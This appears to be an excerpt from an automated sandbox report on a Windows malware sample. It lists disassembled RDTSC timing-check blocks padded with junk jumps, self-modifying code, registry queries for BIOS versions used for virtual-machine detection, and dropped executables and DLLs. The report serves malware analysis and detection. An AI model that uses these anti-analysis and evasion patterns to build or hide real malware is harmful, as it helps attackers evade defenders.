Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 4D40F89 second address: 4D40FE3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F9DF4F3601Ch 0x00000009 xor ax, 99F8h 0x0000000e jmp 00007F9DF4F3601Bh 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 lea eax, dword ptr [ebx+70h] 0x0000001a pushad 0x0000001b pushfd 0x0000001c jmp 00007F9DF4F36024h 0x00000021 or cx, 7458h 0x00000026 jmp 00007F9DF4F3601Bh 0x0000002b popfd 0x0000002c mov si, 250Fh 0x00000030 popad 0x00000031 push 00000001h 0x00000033 pushad 0x00000034 push eax 0x00000035 push edx 0x00000036 pushad 0x00000037 popad 0x00000038 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 4D40FE3 second address: 4D41018 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushfd 0x00000007 jmp 00007F9DF58A6BE8h 0x0000000c sbb ch, FFFFFFE8h 0x0000000f jmp 00007F9DF58A6BDBh 0x00000014 popfd 0x00000015 popad 0x00000016 nop 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 4D41018 second address: 4D4101E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 4D4101E second address: 4D41023 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 4D41023 second address: 4D4104E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F9DF4F3601Ah 0x00000008 pop esi 0x00000009 mov bx, 5C06h 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F9DF4F36023h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 4D4104E second address: 4D41082 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ah, bl 0x00000005 pushfd 0x00000006 jmp 00007F9DF58A6BE0h 0x0000000b and ecx, 241CBDD8h 0x00000011 jmp 00007F9DF58A6BDBh 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a nop 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e mov ah, bh 0x00000020 push esi 0x00000021 pop edx 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 4D41082 second address: 4D410BE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9DF4F36029h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 lea eax, dword ptr [ebp-18h] 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F9DF4F36028h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 4D410BE second address: 4D410CD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9DF58A6BDBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 4D410CD second address: 4D41123 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9DF4F36029h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F9DF4F36023h 0x00000013 add ch, 0000006Eh 0x00000016 jmp 00007F9DF4F36029h 0x0000001b popfd 0x0000001c mov dx, si 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 4D41123 second address: 4D41167 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a jmp 00007F9DF58A6BE0h 0x0000000f call 00007F9DF58A6BE2h 0x00000014 push esi 0x00000015 pop ebx 0x00000016 pop esi 0x00000017 popad 0x00000018 nop 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007F9DF58A6BDFh 0x00000022 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 4D41167 second address: 4D41184 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9DF4F36029h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 4D411D0 second address: 4D411D6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 4D411D6 second address: 4D41274 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9DF4F36027h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov edi, eax 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007F9DF4F36024h 0x00000012 adc ch, 00000028h 0x00000015 jmp 00007F9DF4F3601Bh 0x0000001a popfd 0x0000001b mov dx, ax 0x0000001e popad 0x0000001f test edi, edi 0x00000021 jmp 00007F9DF4F36022h 0x00000026 js 00007F9E673B4495h 0x0000002c jmp 00007F9DF4F36020h 0x00000031 mov eax, dword ptr [ebp-14h] 0x00000034 jmp 00007F9DF4F36020h 0x00000039 mov ecx, esi 0x0000003b push eax 0x0000003c push edx 0x0000003d jmp 00007F9DF4F36027h 0x00000042 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 4D41274 second address: 4D4127A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 4D4127A second address: 4D4127E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 4D4127E second address: 4D41300 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esi+0Ch], eax 0x0000000b jmp 00007F9DF58A6BE7h 0x00000010 mov edx, 772406ECh 0x00000015 jmp 00007F9DF58A6BE6h 0x0000001a sub eax, eax 0x0000001c jmp 00007F9DF58A6BE1h 0x00000021 lock cmpxchg dword ptr [edx], ecx 0x00000025 jmp 00007F9DF58A6BDEh 0x0000002a pop edi 0x0000002b jmp 00007F9DF58A6BE0h 0x00000030 test eax, eax 0x00000032 push eax 0x00000033 push edx 0x00000034 pushad 0x00000035 mov bx, A980h 0x00000039 mov edi, 5DE9DDACh 0x0000003e popad 0x0000003f rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 4D41300 second address: 4D41306 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 4D41306 second address: 4D41395 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9DF58A6BDCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jne 00007F9E67D24F9Ah 0x00000011 jmp 00007F9DF58A6BE0h 0x00000016 mov edx, dword ptr [ebp+08h] 0x00000019 jmp 00007F9DF58A6BE0h 0x0000001e mov eax, dword ptr [esi] 0x00000020 pushad 0x00000021 pushfd 0x00000022 jmp 00007F9DF58A6BDEh 0x00000027 adc ch, 00000058h 0x0000002a jmp 00007F9DF58A6BDBh 0x0000002f popfd 0x00000030 pushfd 0x00000031 jmp 00007F9DF58A6BE8h 0x00000036 and cx, 37B8h 0x0000003b jmp 00007F9DF58A6BDBh 0x00000040 popfd 0x00000041 popad 0x00000042 mov dword ptr [edx], eax 0x00000044 push eax 0x00000045 push edx 0x00000046 push eax 0x00000047 push edx 0x00000048 pushad 0x00000049 popad 0x0000004a rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 4D41395 second address: 4D413B0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9DF4F36027h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 4D413B0 second address: 4D413D6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9DF58A6BE9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esi+04h] 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 4D413D6 second address: 4D413DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 4D413DA second address: 4D413DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 4D413DE second address: 4D413E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 4D413E4 second address: 4D41425 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 mov edx, ecx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [edx+04h], eax 0x0000000d jmp 00007F9DF58A6BE8h 0x00000012 mov eax, dword ptr [esi+08h] 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F9DF58A6BE7h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 4D41425 second address: 4D41485 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx esi, bx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [edx+08h], eax 0x0000000c jmp 00007F9DF4F3601Dh 0x00000011 mov eax, dword ptr [esi+0Ch] 0x00000014 jmp 00007F9DF4F3601Eh 0x00000019 mov dword ptr [edx+0Ch], eax 0x0000001c jmp 00007F9DF4F36020h 0x00000021 mov eax, dword ptr [esi+10h] 0x00000024 push eax 0x00000025 push edx 0x00000026 pushad 0x00000027 mov esi, edi 0x00000029 call 00007F9DF4F36029h 0x0000002e pop esi 0x0000002f popad 0x00000030 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 4D41485 second address: 4D4148B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 4D4148B second address: 4D414B2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9DF4F36028h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [edx+10h], eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 4D414B2 second address: 4D414B8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 4D414B8 second address: 4D414D9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9DF4F36024h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esi+14h] 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 4D414D9 second address: 4D414DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 4D414DD second address: 4D414E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 4D414E3 second address: 4D41517 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F9DF58A6BE2h 0x00000008 mov ax, 3651h 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f mov dword ptr [edx+14h], eax 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F9DF58A6BE3h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 4D41517 second address: 4D4151D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 4D4151D second address: 4D41521 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 4D41521 second address: 4D41532 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esi+18h] 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 4D41532 second address: 4D41536 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 4D41536 second address: 4D4153C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 4D4153C second address: 4D4159E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9DF58A6BDBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [edx+18h], eax 0x0000000c pushad 0x0000000d pushad 0x0000000e call 00007F9DF58A6BE2h 0x00000013 pop ecx 0x00000014 mov al, bl 0x00000016 popad 0x00000017 mov edi, esi 0x00000019 popad 0x0000001a mov eax, dword ptr [esi+1Ch] 0x0000001d pushad 0x0000001e jmp 00007F9DF58A6BDBh 0x00000023 popad 0x00000024 mov dword ptr [edx+1Ch], eax 0x00000027 pushad 0x00000028 push ecx 0x00000029 movsx ebx, cx 0x0000002c pop eax 0x0000002d jmp 00007F9DF58A6BDDh 0x00000032 popad 0x00000033 mov eax, dword ptr [esi+20h] 0x00000036 push eax 0x00000037 push edx 0x00000038 pushad 0x00000039 pushad 0x0000003a popad 0x0000003b mov edx, 5812EC3Ch 0x00000040 popad 0x00000041 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 4D4159E second address: 4D41600 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9DF4F36022h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [edx+20h], eax 0x0000000c jmp 00007F9DF4F36020h 0x00000011 mov eax, dword ptr [esi+24h] 0x00000014 jmp 00007F9DF4F36020h 0x00000019 mov dword ptr [edx+24h], eax 0x0000001c pushad 0x0000001d movzx eax, bx 0x00000020 popad 0x00000021 mov eax, dword ptr [esi+28h] 0x00000024 push eax 0x00000025 push edx 0x00000026 push eax 0x00000027 push edx 0x00000028 jmp 00007F9DF4F36027h 0x0000002d rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 4D41600 second address: 4D4161D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9DF58A6BE9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 4D4161D second address: 4D41665 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9DF4F36021h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [edx+28h], eax 0x0000000c jmp 00007F9DF4F3601Eh 0x00000011 mov ecx, dword ptr [esi+2Ch] 0x00000014 jmp 00007F9DF4F36020h 0x00000019 mov dword ptr [edx+2Ch], ecx 0x0000001c pushad 0x0000001d mov edi, eax 0x0000001f popad 0x00000020 mov ax, word ptr [esi+30h] 0x00000024 pushad 0x00000025 push edi 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 4D41665 second address: 4D416B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushfd 0x00000006 jmp 00007F9DF58A6BE7h 0x0000000b sub cx, 5CFEh 0x00000010 jmp 00007F9DF58A6BE9h 0x00000015 popfd 0x00000016 popad 0x00000017 mov word ptr [edx+30h], ax 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007F9DF58A6BDDh 0x00000022 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 4D416B5 second address: 4D416E6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9DF4F36021h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ax, word ptr [esi+32h] 0x0000000d jmp 00007F9DF4F3601Eh 0x00000012 mov word ptr [edx+32h], ax 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 4D416E6 second address: 4D416EC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 4D416EC second address: 4D41724 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F9DF4F36022h 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [esi+34h] 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F9DF4F36029h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 4D41724 second address: 4D4172A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 4D4172A second address: 4D4175F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx ebx, ax 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [edx+34h], eax 0x0000000c jmp 00007F9DF4F36020h 0x00000011 test ecx, 00000700h 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a jmp 00007F9DF4F3601Dh 0x0000001f mov ebx, eax 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 4D4175F second address: 4D417DF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9DF58A6BDDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jne 00007F9E67D24B7Dh 0x0000000f pushad 0x00000010 jmp 00007F9DF58A6BDCh 0x00000015 pushfd 0x00000016 jmp 00007F9DF58A6BE2h 0x0000001b sbb eax, 60727A38h 0x00000021 jmp 00007F9DF58A6BDBh 0x00000026 popfd 0x00000027 popad 0x00000028 or dword ptr [edx+38h], FFFFFFFFh 0x0000002c jmp 00007F9DF58A6BE6h 0x00000031 or dword ptr [edx+3Ch], FFFFFFFFh 0x00000035 jmp 00007F9DF58A6BE0h 0x0000003a or dword ptr [edx+40h], FFFFFFFFh 0x0000003e pushad 0x0000003f pushad 0x00000040 push eax 0x00000041 push edx 0x00000042 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 4D417DF second address: 4D417E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 4D417E9 second address: 4D41808 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 pop esi 0x00000007 jmp 00007F9DF58A6BDEh 0x0000000c pop ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 mov al, bh 0x00000012 movzx ecx, bx 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 4D41808 second address: 4D4181C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F9DF4F3601Eh 0x00000008 pop ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 4D4181C second address: 4D41830 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 leave 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F9DF58A6BDAh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 4D901A2 second address: 4D90219 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9DF4F36021h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F9DF4F3601Eh 0x0000000f push eax 0x00000010 jmp 00007F9DF4F3601Bh 0x00000015 xchg eax, ebp 0x00000016 jmp 00007F9DF4F36026h 0x0000001b mov ebp, esp 0x0000001d pushad 0x0000001e push ecx 0x0000001f mov ax, di 0x00000022 pop ebx 0x00000023 push eax 0x00000024 push edx 0x00000025 pushfd 0x00000026 jmp 00007F9DF4F36024h 0x0000002b adc si, 7DD8h 0x00000030 jmp 00007F9DF4F3601Bh 0x00000035 popfd 0x00000036 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 4D20F0B second address: 4D20F11 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 4D20F11 second address: 4D20F15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 4D20F15 second address: 4D20F4A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9DF58A6BDDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c jmp 00007F9DF58A6BDEh 0x00000011 push eax 0x00000012 jmp 00007F9DF58A6BDBh 0x00000017 xchg eax, ebp 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 4D20F4A second address: 4D20F65 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9DF4F36027h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 4D41875 second address: 4D418B4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 movzx ecx, bx 0x00000009 popad 0x0000000a push esi 0x0000000b jmp 00007F9DF58A6BE8h 0x00000010 mov dword ptr [esp], ebp 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F9DF58A6BE7h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 4D418B4 second address: 4D4191A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9DF4F36029h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e call 00007F9DF4F36023h 0x00000013 pop esi 0x00000014 pushfd 0x00000015 jmp 00007F9DF4F36029h 0x0000001a sbb ch, FFFFFF86h 0x0000001d jmp 00007F9DF4F36021h 0x00000022 popfd 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 4D419D8 second address: 4D41875 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, 1A82154Ah 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ebp 0x0000000c jmp 00007F9DF58A6BDCh 0x00000011 retn 0008h 0x00000014 push 0042F258h 0x00000019 push edi 0x0000001a mov dword ptr [00434D64h], eax 0x0000001f call esi 0x00000021 mov edi, edi 0x00000023 pushad 0x00000024 push eax 0x00000025 push edx 0x00000026 jmp 00007F9DF58A6BE2h 0x0000002b rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 4D803DF second address: 4D803E5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exe Special instruction interceptor: First address: 81CF00 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\zSmMqGGeVy.exe Special instruction interceptor: First address: 9BC349 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\zSmMqGGeVy.exe Special instruction interceptor: First address: 9BAE2B instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\zSmMqGGeVy.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\Desktop\zSmMqGGeVy.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Source: C:\Users\user\Desktop\zSmMqGGeVy.exe Code function: 0_2_00A930C8 rdtsc 0_2_00A930C8
Source: C:\Users\user\Desktop\zSmMqGGeVy.exe Window / User API: threadDelayed 1259
Source: C:\Users\user\Desktop\zSmMqGGeVy.exe Window / User API: threadDelayed 1741
Source: C:\Users\user\Desktop\zSmMqGGeVy.exe Window / User API: threadDelayed 1711
Source: C:\Users\user\Desktop\zSmMqGGeVy.exe Window / User API: threadDelayed 1753
Source: C:\Users\user\Desktop\zSmMqGGeVy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\VwweWtdD5CJ\Y-Cleaner.exe
Source: C:\Users\user\Desktop\zSmMqGGeVy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\dll[1]
Source: C:\Users\user\Desktop\zSmMqGGeVy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\soft[1]
Source: C:\Users\user\Desktop\zSmMqGGeVy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\VwweWtdD5CJ\Bunifu_UI_v1.5.3.dll
